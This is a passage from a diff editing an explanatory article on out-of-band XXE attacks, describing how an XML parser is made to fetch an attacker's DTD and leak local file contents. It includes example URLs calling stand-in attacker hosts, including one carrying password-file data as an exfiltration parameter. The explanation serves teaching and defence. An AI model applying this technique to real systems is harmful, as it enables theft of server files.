 The process for exploiting out-of-band XXE vulnerabilities is similar to using parameter entities with in-band XXE and involves the creation of an external DTD (Document Type Definition).
 There is one major difference: with this type of attack, the attacker needs the XML parser to make an additional request to an attacker-controlled server.
 This is needed to read the contents of the local file.

-The following is an example of how an attacker could leverage parameter entities to steal data using an Out-of-band (OOB) technique.
+The following is an example of how an attacker could leverage parameter entities to steal sensitive data using an out-of-band (OOB) technique.

-/etc/lsb-release.
-Next, the XML parser will make a request to the attacker’s DTD at http://attacker.com/evil.dtd.
+- Next, the XML parser makes a request to the attacker’s DTD file at http://attack.example.com/evil.dtd.

 - After the XML parser processes the attacker’s DTD file, the

 %allparameter entity creates a general entity called

 &send, which contains a URL.
 This URL includes the file contents (e.g. http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh…).

 - Finally, after the URL is constructed, the XML parser processes the